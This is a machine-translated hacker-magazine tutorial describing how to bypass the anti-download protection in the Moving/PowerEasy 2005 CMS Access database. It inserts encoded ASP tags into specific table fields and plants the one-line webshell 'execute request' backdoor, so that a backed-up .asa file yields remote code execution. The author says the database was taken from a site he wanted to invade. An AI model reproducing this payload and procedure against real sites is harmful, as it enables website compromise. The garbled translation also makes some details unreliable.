Article author: Heian period[S. H. C] (http://vip8.org) Information source: evil octal information security team www.eviloctal.com）
This article is published in<<manual hacker>>2 0 0 7 year of the sixth period, article copyright belongs to the hacker manual.
For the test environment: Moving-2 0 0 5 FREE version download address:http://down. chinaz. com/s/1 4 6 6 1. asp This version relative to the previous version almost patch the vulnerability, and what upload vulnerability, in the top menu to write a word, all die, today also do not discuss whether there are other vulnerabilities, just to discuss about how to backup the database to get the shell.
First to say about the move-database processing: Moving easy in the database adds a table: PE-NotDown In this table write the hex data: 3C25206C6F6F70203C25
Someone will not understand this data in the end is what stuff Ah, look at can't read, in fact this string of data is”<% loop <%”hexadecimal form. Although in the data table is in hex form, but if the mdb database to the asp form to parse, then it will be in the form of characters displayed. Slightly understand a bit of asp syntax people know"<% loop <%"is not closed, and the loop also no do or exit do to with paired. I have tried many times, are not be closed. So in the end to how can be closed?, in fact, say to you also but it is not very simple, huh. For example, the following code:
<% loop <%
Save it as an asp file parsing when there is no closing, less (percent >), as in the following figure:
If we later add a"%>", or an error occurs, then the end to how to remember this section of the Code of the function remove it, we then look at the following piece of code:
<%'<% loop <%:%>
This piece of code in the IIS running without any error, according to this Code of principle, so we will have a break of possibility, as long as we are in the database in two places appropriate to insert the"<%'"and":%>" in the database sometimes do not colon can also to the loop of the anti-download to filter out, I believe we see here should also understand what is going on. The above is all theory, I in the local moving-2 0 0 5 the database for the test, we look at the test results. (This test does not have any targeted only for research purposes, this method of publication, I do not take any responsibility) First install automatically easy, this version of the move-basically fixes some vulnerabilities, it does not talk about whether there are other vulnerabilities, just to talk to the database break. I tested with the database is from a site lower down the database, because always want to invade this site, only got the database, so in the course of the study the study is this database, the test also is also this database. Down under after the first database backup, after testing with a copy of it for testing, because the changes to the access of data is something to note(will be mentioned later on). Our first move-the data of extension into the asa, and then in the iis in the Open, Open the results to keep up with a picture is the same, is also to appear less"% >"error, this is Action-anti-download processing. Then we use UltraEdit to open move easy to the database, select the hex editor, then search for"<%"we can navigate to the following place:
We can see display green of a bar where you can see"<% loop <%"this statement confirms our previous argument, we continue search after found only in the loop before and after a total of two"<%", i.e. is not closed a statement. So how are we going to break? The front also talked about, in asp syntax, the single quotes from the comments of the function, we are not in front of it plus commented statement does, and then in another place then insert closing statement that's not can be a breakthrough? Open the database table design, we first find a place to it will be completed together, we see Table PE-NotDown before and after the table structure is as follows:
Here, is not to be in PE_NotDown front of a table added to the code behind of the asp code commented out for? To test it, I selected the PE_NewKeys, after opening on the inside to insert a line of code, where I used to lake2 a ascii2unicode tool will be the code"<%'x"(why the back of the x, in fact, with other characters can also be, as long as the result of the conversion does not appear the question mark)is converted into"┼anvil"(this conversion is first performed in the background modified to become feasible, because there is nothing special characters, and the converted database was renamed the asa for analysis can be returned to the original characters, if you need to know the specific circumstances, please go to the lake2 blog to see), and then insert into it, as shown in Figure:
After saving our data to the asa suffix after opening with error as in the first graph, less closing descriptor"% >"we re-use UltraEdit open, search for"<%", the search to the first one and the second picture is the same as that in the first 4 5 8 line there get to the loop statement, continue down the search two times, we in 1 9 1 1 8 rows where search to we just inserted into the database, as shown below:
Let's analyze:"<% loop <%"PE_NotDown in the data, and"┼anvil"is PE_NewKeys of information, although the table structure PE_NewKeys row in PE_NotDown the front, but it can be through the asa parsed"<% loop <%", but the front surface of the display, and therefore the access of data into the asa analysis after which data order is changed. Then we are going to how to make it display in front of it, because they do not know the specific structure of the order, I chose the brute-force method. From the first table to each field in the inserted"┼anvil", and then by UltraEdit to view, to see which will appear in the front, each time you insert before the data are used in the original dynamic easy database a copy of, because in access, you will be a record to delete, although in the table structure to see, but it still exists in the database, with UltraEdit can see, only the database is compressed after those deleted records will only be truly deleted here that compression is not used winrar compressed that one, and access the compression feature. Each time you plug the data and then with UltraEdit search for character"<%", to facilitate better search positioning. In a time of testing,when the test to PE_channel this table,the problem appears to turn. We take a look at, open the data table, locate the PE_channel this table,in the field ChannelName in the"Academy news"later added"┼anvil",as shown in Figure:
Save and then use UltraEdit to open the data,with hex edit,search for"<%",and we search to the first results in the following figure:
In this case the first occurrence of"<%"is not original with the loop connected to that,that we are now in the loop in front of the insertion of a asp tag"<%", then we also have in the loop back to a certain place and then insert the"%>"to get it closed,also I used the brute-force method after the test found another insertion point. In our last title back plus a"┠gravel"(this is by the" %>x"is converted over), as in the following figure:
Save and then use UltraEdit to view, search"%>x", at the 7 5 4 6 row there to find the We just inserted the information, as shown below:
We will now summarize: A total of insert the data twice: For the first time in insert the data"┼anvil"in the 1 8 9 row is parsed into an asp statement"<%'x" The second insertion data"┠gravel"in paragraph 7 5 4 6 line is parsed into an asp statement"%>x" In the wings-the original anti-download statement"<% loop <%"appears in paragraph 4 5 line 8, just at twice the data inserted in the middle. In this case we will data renamed*. asa post in the iis in the analysis, the results are as follows figure:
At this time there are a portion of the data is parsed out, then we break to reach the effect, so we think of the first insertion of the data back and then add"execute request("#")"not can get to a back door? So I will be the string“<% execute request("#")%>a<%'x”is converted into a Unicode character“┼pay offs number 畣 whole 爠 Hwan enemy 瑳∨∣┩anger┼anvil”after the Insert to the first insert the data in place, as shown in Figure:
Then use UltraEdit to view the insertion of the results of the search we insert the data in the following figure:
We found that the newly inserted data to appear in the first 7 4 0 5 rows, with the first plug of the first 1 8 9 row, far cry, and since no turn loop statement package intoGo, and the database also cannot be resolved. So we had to return to the previous step, and then find other place to start. Later looking for a long time did not find, then went back to study in IIS to display the information, we see the following figure:
We see here a lot of“jpg|jpeg”and so what, we can think of here is to save the upload data type of the place, we may not be the word horse into the here, let it be resolved yet. Well I no longer fee, or re-copy an original data replica, to press the original step in ChannelNamer the first title and last title back insert the relevant data according to the previous method, then I will be the word horse“<% execute request("#")%>a”go to Unicode character“┼pay offs number 畣 whole 爠 Hwan enemy 瑳∨∣┩anger”after inserted to the following places, as shown below:
Use UltraEdit to open the post in the 1 9 6 line search to“execute”, as shown below:
In the 1 8 9 search to“<%' x” In the first 4 8 3 row search loop In the first 7 4 0 3 line search to our asp-closing statement I have according to the order which was shown to mark out, in a word the back door in the front, should be able to perform. We are in the iis to find the opening and after to give results such as(opening time a little longer, depending on the size of the database):
Our word horse successful implementation, thus breaking the database of the anti-download function, and can through the data backup to get back door. PostScript: finish this article after I had used other moving-2 0 0 5 the database was tested by the same method to insert, but do not get the desired results, it seems that this method is a specific database to a specific analysis, different database to insert the data of the place is different, even the same database, as long as the data changes, insert the place it may be different, if you experiment then you have to according to the above method of insertion and positioning, remember that the invasion is not copied, the best First Site data backup, if not you can also restore back. Some pay attention to where, if the data is too large, with IIS Open IIS may hang up, the machine performance is better.
Sorry, my day can only transfer 1 0 a accessories, part of the picture pass will not only with my blog pictures. Forgive me!